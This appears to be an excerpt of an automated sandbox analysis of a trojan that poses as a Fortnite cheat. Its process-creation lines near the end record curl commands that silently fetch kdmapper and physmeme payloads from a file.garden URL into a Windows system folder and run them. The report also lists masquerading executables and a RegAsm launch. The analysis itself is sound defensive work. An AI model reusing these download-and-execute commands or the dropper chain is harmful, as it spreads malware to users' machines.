                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78662269D0_2_00007FF78662269D
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78662DB3C0_2_00007FF78662DB3C
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF786619B400_2_00007FF786619B40
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF786600BA00_2_00007FF786600BA0
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7865F8BA00_2_00007FF7865F8BA0
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7865EF4800_2_00007FF7865EF480
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7865FD4700_2_00007FF7865FD470
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7865E24F00_2_00007FF7865E24F0
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78661ECD00_2_00007FF78661ECD0
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78660E4B00_2_00007FF78660E4B0
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7866059900_2_00007FF786605990
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7865F09600_2_00007FF7865F0960
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78660A1600_2_00007FF78660A160
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78660EA700_2_00007FF78660EA70
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF786603A700_2_00007FF786603A70
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7865F92500_2_00007FF7865F9250
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7866052200_2_00007FF786605220
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF7865FA2F00_2_00007FF7865FA2F0
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78661B2D00_2_00007FF78661B2D0
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0060848E5_2_0060848E
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_006040FE5_2_006040FE
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_006100B75_2_006100B7
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_006140885_2_00614088
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_006171535_2_00617153
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_006251C95_2_006251C9
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_006032F75_2_006032F7
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_006162CA5_2_006162CA
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_006143BF5_2_006143BF
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0060F4615_2_0060F461
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0062D4405_2_0062D440
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0060C4265_2_0060C426
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_006177EF5_2_006177EF
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0060286B5_2_0060286B
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0062D8EE5_2_0062D8EE
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_006319F45_2_006319F4
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0060E9B75_2_0060E9B7
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_00616CDC5_2_00616CDC
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_00613E0B5_2_00613E0B
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0060EFE25_2_0060EFE2
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_00624F9A5_2_00624F9A
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043804012_2_00438040
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042C07012_2_0042C070
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044907012_2_00449070
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040100012_2_00401000
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040B0E012_2_0040B0E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040C08012_2_0040C080
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042D15012_2_0042D150
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004491F012_2_004491F0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041F19312_2_0041F193
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040924012_2_00409240
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042C24312_2_0042C243
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004492F012_2_004492F0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043E2A012_2_0043E2A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004012B312_2_004012B3
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040135912_2_00401359
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041636112_2_00416361
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042D3CC12_2_0042D3CC
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004493D012_2_004493D0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004483B012_2_004483B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004113BD12_2_004113BD
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040546012_2_00405460
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044742912_2_00447429
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004094D712_2_004094D7
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040A4E012_2_0040A4E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042B49012_2_0042B490
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004074B012_2_004074B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040B57012_2_0040B570
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004366E012_2_004366E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041D6A012_2_0041D6A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044970012_2_00449700
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004117C012_2_004117C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042F7DB12_2_0042F7DB
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040885012_2_00408850
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040389012_2_00403890
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044A8B012_2_0044A8B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004488B012_2_004488B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043697012_2_00436970
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0045392E12_2_0045392E
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041399C12_2_0041399C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040AA0012_2_0040AA00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00427AFB12_2_00427AFB
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042BC5012_2_0042BC50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00413CC612_2_00413CC6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042CCDD12_2_0042CCDD
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042CCF512_2_0042CCF5
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00429DF212_2_00429DF2
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00437D9012_2_00437D90
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040CE0012_2_0040CE00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00431E0012_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00415EF612_2_00415EF6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00407EB012_2_00407EB0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00427F6212_2_00427F62
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00443FA012_2_00443FA0
                                Source: C:\Edge\msedge.exeCode function: 16_2_00007FFB4AF30D8016_2_00007FFB4AF30D80
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFB4AFE39D131_2_00007FFB4AFE39D1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFB4AFE30E931_2_00007FFB4AFE30E9
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFB4AFF30E932_2_00007FFB4AFF30E9
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4AF10B0639_2_00007FFB4AF10B06
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4AF00D8039_2_00007FFB4AF00D80
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4AF3122539_2_00007FFB4AF31225
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4AF397E039_2_00007FFB4AF397E0
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4AF3D30A39_2_00007FFB4AF3D30A
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4AF3BF4239_2_00007FFB4AF3BF42
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4AF10FC739_2_00007FFB4AF10FC7
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4AF1177E39_2_00007FFB4AF1177E
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4AF111A939_2_00007FFB4AF111A9
                                Source: C:\Edge\msedge.exeCode function: 40_2_00007FFB4AF30D8040_2_00007FFB4AF30D80
                                Source: C:\Edge\msedge.exeCode function: 40_2_00007FFB4AF40B0640_2_00007FFB4AF40B06
                                Source: C:\Edge\msedge.exeCode function: 40_2_00007FFB4AF6122540_2_00007FFB4AF61225
                                Source: C:\Edge\msedge.exeCode function: 40_2_00007FFB4AF697E040_2_00007FFB4AF697E0
                                Source: C:\Edge\msedge.exeCode function: 40_2_00007FFB4AF6BE9D40_2_00007FFB4AF6BE9D
                                Source: C:\Edge\msedge.exeCode function: 40_2_00007FFB4AF6D30A40_2_00007FFB4AF6D30A
                                Source: C:\Edge\msedge.exeCode function: 40_2_00007FFB4AF40FC740_2_00007FFB4AF40FC7
                                Source: C:\Edge\msedge.exeCode function: 40_2_00007FFB4AF4177E40_2_00007FFB4AF4177E
                                Source: C:\Edge\msedge.exeCode function: 40_2_00007FFB4AF411A940_2_00007FFB4AF411A9
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeCode function: 42_2_00007FFB4AF00D8042_2_00007FFB4AF00D80
                                Source: C:\Edge\msedge.exeCode function: 51_2_00007FFB4AF20D8051_2_00007FFB4AF20D80
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeCode function: 56_2_00007FFB4AF20D8056_2_00007FFB4AF20D80
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeCode function: 56_2_00007FFB4AF30B0656_2_00007FFB4AF30B06
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeCode function: 56_2_00007FFB4AF5122556_2_00007FFB4AF51225
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeCode function: 56_2_00007FFB4AF597E056_2_00007FFB4AF597E0
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeCode function: 56_2_00007FFB4AF5BE9D56_2_00007FFB4AF5BE9D
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeCode function: 56_2_00007FFB4AF5D30A56_2_00007FFB4AF5D30A
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeCode function: 56_2_00007FFB4AF30FC756_2_00007FFB4AF30FC7
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeCode function: 56_2_00007FFB4AF3177E56_2_00007FFB4AF3177E
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeCode function: 56_2_00007FFB4AF311A956_2_00007FFB4AF311A9
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AznuGYbp.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: String function: 00007FF78661E8C0 appears 148 times
                                Source: C:\Windows\Speech\kdmapper.exeCode function: String function: 0061EB78 appears 39 times
                                Source: C:\Windows\Speech\kdmapper.exeCode function: String function: 0061F5F0 appears 31 times
                                Source: C:\Windows\Speech\kdmapper.exeCode function: String function: 0061EC50 appears 56 times
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040CBE0 appears 53 times
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040EE60 appears 145 times
                                Source: IlfCUBRc.log.16.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                Source: KiGKqBgX.log.16.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                Source: AznuGYbp.log.16.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                Source: rWfFWfLI.log.16.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                Source: jsWPmlvb.log.16.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                Source: msedge.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: physmeme.exe.7.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: WmiPrvSE.exe.16.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: IlfCUBRc.log.16.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                Source: KiGKqBgX.log.16.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                Source: AznuGYbp.log.16.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                Source: rWfFWfLI.log.16.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                Source: jsWPmlvb.log.16.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@80/50@21/3
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_00606C74 GetLastError,FormatMessageW,5_2_00606C74
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF786623ED0 CreateThread,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cin@std@@3V?$basic_istream@DU?$char_traits@D@std@@@1@A,??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z,system,CreateFileW,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,system,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,Sleep,system,system,system,CreateFileW,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,system,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,MessageBoxA,system,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,Process32Next,CloseHandle,DeviceIoControl,MessageBoxA,exit,CloseHandle,_beginthreadex,_Thrd_detach,_beginthreadex,_Thrd_detach,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,DefWindowProcA,LoadIconA,LoadCursorA,LoadIconA,GetDesktopWindow,GetWindowRect,RegisterClassExA,CreateWindowExA,SetWindowLongA,DwmExtendFrameIntoClientArea,ShowWindow,SetWindowPos,SetLayeredWindowAttributes,UpdateWindow,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,?_Throw_Cpp_error@std@@YAXH@Z,0_2_00007FF786623ED0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004345E0 CoCreateInstance,12_2_004345E0
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0061A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,5_2_0061A6C2
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C202AE04657426D812F38F5265327B.TMP
                                Source: C:\Windows\Speech\physmeme.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\physmeme.exe.logJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_03
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5212:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5056:120:WilError_03
                                Source: C:\Edge\msedge.exeMutant created: \Sessions\1\BaseNamedObjects\Local\JFIOSDHSUDFHUSIDGHHDJCXZCHBKLJZGVHSKDFGOIUYDSGYOIYD
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5472:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4676:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4620:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4496:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:708:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5864:120:WilError_03
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\AppData\Local\Temp\lar3wzddJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "
                                Source: C:\Windows\Speech\kdmapper.exeCommand line argument: sfxname5_2_0061DF1E
                                Source: C:\Windows\Speech\kdmapper.exeCommand line argument: sfxstime5_2_0061DF1E
                                Source: C:\Windows\Speech\kdmapper.exeCommand line argument: STARTDLG5_2_0061DF1E
                                Source: C:\Windows\Speech\kdmapper.exeCommand line argument: xze5_2_0061DF1E
                                Source: seoI30IZZr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: seoI30IZZr.exeReversingLabs: Detection: 55%
                                Source: seoI30IZZr.exeString found in binary or memory: Save/Load
                                Source: seoI30IZZr.exeString found in binary or memory: Save/Load
                                Source: seoI30IZZr.exeString found in binary or memory: CombatVisualsWeaponConfigMisc##MainAimbotPredictionTriggerbotTriggerbot Delay (ms)Triggerbot Distance (m)Fov CircleFilled FovFov SizeSmoothingHitboxCorner 2D 3D NothingRankDraw FilledUsernameSnaplineSkeletonFov ArrowsDistanceRender CountWeapon configShotgun SettingsShotgun SmoothShotgun FovSMG SettingsPrediction SMG SmoothSMG FovRifle SettingsPrediction Rifle SmoothRifle FovSniper SettingsPrediction Sniper SmoothSniper Fov(AIR STUCK)RISKY FEATURE:Air StuckUnload##Main1Save/LoadSave Configconfig.jsonLoad Config##MainsLegit ConfigSemi ConfigRage ConfigReaper Sniper RifleBolt-Action Sniper RifleHeavy Sniper RifleStorm Scout Sniper RifleHunting RiflePump ShotgunTactical ShotgunCharge ShotgunSuppressed SMGCompact SMGRapid Fire SMGAssault RifleBurst Assault RifleTactical Assault RifleThermal Scoped Assault RifleScoped Assault RiflePumpShotgunTacticalShotgunChargeShotgunLeverActionShotgunDragonBreathShotgunDoubleBarrelShotgunAutoShotgunSingleShotgunCombatShotgunSlugShotgunVisible Entities: Nearby Entities: HandsBronze 1Bronze 2Bronze 3Silver 1Silver 2Silver 3Gold 1Gold 2Gold 3Platinum 1Platinum 2Platinum 3Diamond 1Diamond 2Diamond 3EliteChampionUnrealUnrankedm] Load Dependencies (Close Game First) Inject Orqur Your choice: cls Driver FoundDriver Error Contact Support. Waiting For FortniteFortniteClient-Win64-Shipping.exeThe driver could not get the base address...Base Address -> VAText -> cr3 -> vector too long|\XN[ZWQ'a5**!)0h-/?).:*4
                                Source: unknownProcess created: C:\Users\user\Desktop\seoI30IZZr.exe "C:\Users\user\Desktop\seoI30IZZr.exe"
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeProcess created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe"
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
                                Source: C:\Windows\Speech\kdmapper.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeProcess created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe"
                                Source: C:\Windows\Speech\physmeme.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\Speech\physmeme.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Windows\Speech\physmeme.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
